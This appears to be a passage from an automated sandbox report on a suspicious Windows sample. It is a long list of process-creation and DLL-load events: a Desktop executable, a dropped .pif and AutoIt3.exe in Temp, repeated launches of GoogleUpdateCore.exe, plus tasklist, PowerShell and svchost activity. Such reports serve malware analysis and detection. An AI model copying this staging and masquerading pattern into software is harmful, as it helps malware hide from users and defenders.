          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exeProcess created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe"
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: apphelp.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: version.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: shfolder.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: wldp.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: propsys.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: riched20.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: usp10.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: msls31.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: wintypes.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: wintypes.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: wintypes.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: textshaping.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: profapi.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: edputil.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: urlmon.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: iertutil.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: srvcli.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: netutils.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: sspicli.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: appresolver.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: bcp47langs.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: slc.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: userenv.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: sppc.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: napinsp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: pnrpnsp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: wshbth.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: nlaapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: winrnr.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: webio.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: wbemcomn.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: amsi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: apphelp.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: msimg32.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: dwrite.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: d2d1.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: oledlg.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: oleacc.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: dwmapi.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: windowscodecs.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: pla.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: pdh.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: tdh.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: cabinet.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: wevtapi.dll
          Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exeSection loaded: shdocvw.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
